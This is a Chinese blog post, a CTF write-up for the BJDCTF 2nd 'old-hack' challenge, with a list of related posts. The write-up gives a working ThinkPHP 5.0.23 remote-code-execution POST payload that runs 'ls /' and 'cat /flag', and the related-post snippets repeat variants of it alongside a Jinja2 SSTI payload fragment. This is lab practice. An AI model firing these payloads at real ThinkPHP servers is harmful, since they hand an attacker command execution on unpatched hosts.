[BJDCTF 2nd]old-hack ctf

于 2020-11-09 20:48:16 发布
阅读量181 收藏 1
点赞数
分类专栏: ctf 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyaowangchuan/article/details/109585269
版权

[BJDCTF 2nd]old-hack
在这里插入图片描述
告诉了我们是THINKPHP5的漏洞
搜这个版本的漏洞
发现是thinkphp5.0.23的命令执行
THINKPHP 5.0.X-5.0.23、5.1.X、5.2.X 全版本远程代码执行漏洞分析

ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析

payload
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /
使用new hackbar post传参
在这里插入图片描述
_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag
查看flag
在这里插入图片描述
在这里插入图片描述
右上角有flag
flag{1613c541-43a2-4e99-88e8-7f739d9baba8}
不好复制的话就F12

wuyaoooo
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BJDCTF 2nd] old-hack
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-22 712
漏洞:ThinkPHP 5.0.23 RCE 参考https://www.codercto.com/a/54587.html http://ip_addr/index.php?s=captcha payload _method=__construct&filter[]=system&method=get&get[]=whoami
[BJDCTF 2nd]old-hack -wp
freerats的博客
07-04 364
进入网站,看到提示,powered By THINKPHP5 知道肯定与thinkphp5有关 传入一个s=1报错查看一下信息(这里要遇见过才知道,没什么技巧) 版本为50.0.23 post提交 _method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / 触发命令执行漏洞 cat /flag ...
[BJDCTF 2nd]old-hack
夜幕下的灯火阑珊的博客
05-13 913
知识点 thinkphp 5.0.23 RCE漏洞 题目 题目提示thinkphp5 构造index.php?s=1报错看看 看到版本号为5.0.23,搜索一波5.0.23漏洞 ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析 直接用payload打就是了
【学习笔记14】buu [BJDCTF 2nd]old-hack
weixin_43553654的博客
05-14 316
首先打开网站一看,映入眼球,thinkphp,但是不知道是什么版本的所以就想办法构造一个报错来让它显示一些更详细的信息http://59429912-fc6a-4d2d-945a-c1aabf47f19f.node3.buuoj.cn/?s=3 这样就可以看到thinkphp的版本了是5.0.23版本接下来就简单了求助度娘,查找thinkphp5.0.23对应版本的漏洞最后在...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
2022工业互联网大赛-杭州-CTF题目
09-14
第一次参加工控类的CTF,然后正好团队中有一个小伙伴电脑连不上局域网,只能从我电脑中下载下来,因此这次正好有完整的题目和附件,然后也基本是misc和crypto题。分享给需要的朋友,如果有人能写出writeup的话,那就...
google-ctf:Google CTF
02-04
Google CTF 该存储库列出了2017-2019 Google CTF中使用的大多数挑战以及可用于运行这些挑战的大多数基础结构。 重要信息-2017、2018、2019和2020文件夹中的代码具有未修复的安全漏洞。 这些是故意存在的,并且在...
saigar-ctf:Saigar CTF 平台
05-29
赛加尔CTF世界上第一个众包调查的 CTF 平台介绍Saigar CTF 是一个开源 CTF 平台,用于促进众包调查,可以扩展到数百个具有实时数据的并发用户。 Saigar CTF 平台促成的最大事件有500 多个用户,在6 小时内提交了8,...
[BJDCTF 2nd]old-hack --TP5 5.0.23
weixin_46200406的博客
10-25 97
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
[BJDCTF 2nd]old-hack_thinkphp漏洞
kuller_Yan的博客
10-23 198
[BJDCTF 2nd]old-hack_thinkphp5漏洞 进入页面提示是thinkphp,先构造一个报错 然后看到版本为THINK_VERSION5.0.23 然后百度查询漏洞: payload:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / POST提交尝试一下,发现可行,然后就cat /flag ...
BJDCTF 2nd WEB
A_dmin的博客
03-24 7077
BJDCTF 2nd WEB emmm,比赛做了几道题,赛后官方给了wp,把没做出来的复现一下,,,, [BJDCTF 2nd]fake google 一个SSTI,发现是jinja2的,直接用payload打就行: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='_IterationGuard' %...
BJDCTF 2nd菜鸡做题记录
bmth666的博客
03-25 3082
文章目录 萌新赛 做了一下web,感觉还没有入门,太难了吧,然后看大佬博客把能写的复现一下 [BJDCTF 2nd]简单注入 这道题没写出来,想了好久才想到可以用\转义掉',然后就开始盲注,发现禁用了select,尝试绕过未果,卡死,看师傅文章才发现可以正则匹配出password,妙呀,先写一下我的思路 username=\ password=...
[BJDCTF 2nd] web题-old-hack
BROTHERYY的博客
07-13 324
复现环境:buuoj.cn 发现是thinkphp5,让页面报错找到了具体的版本号。 上网找了这个漏洞的payload POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls / 使用hackbar的post传递这个参数进去,查看根目录下的文件 读取flag flag{dc909607-e27c-40a9-86e8-2de6079ed503} ...
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2722
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
BJDCTF 2nd(WEB复现)
ChenZIDu的博客
04-02 799
记录一下,以后忘记了还能看看 fake google-飞机票 duangShell .index.php.swp源码泄露 一进去提示我们:how can i give you source code? .swp?!,获取源码后,利用vim再把它改回去就行,直接打开会乱码:vim -r index.php.swp恢复。 因为exec()无回显,而且没有禁curl。所以可以反弹shell~~ ...
[BJDCTF 2nd] diff2
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-24 877
题目下载地址:点此下载 这里存在溢出漏洞 一般师傅:char + char = char 没毛病 keer师傅:char + char = 溢出!怼他! 我们知道char型变量占1个字节,相当于unsigned byte,表示范围是0x0-0xff,那么两char相加的范围就是0x0 - 0x1fe ,可是char型只能存储1个字节的数据,因此两char相加产生的进位就会被忽略。举个栗子,0x...
Apple-Mail CTF
最新发布
07-27
回答: Apple-Mail CTF是一个CTF(Capture The Flag)比赛中的一个题目或挑战。根据提供的引用内容,我们无法确定具体的Apple-Mail CTF是什么样的题目或挑战。引用\[1\]提到了EML文件的常见文件扩展名,而引用\[2\]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值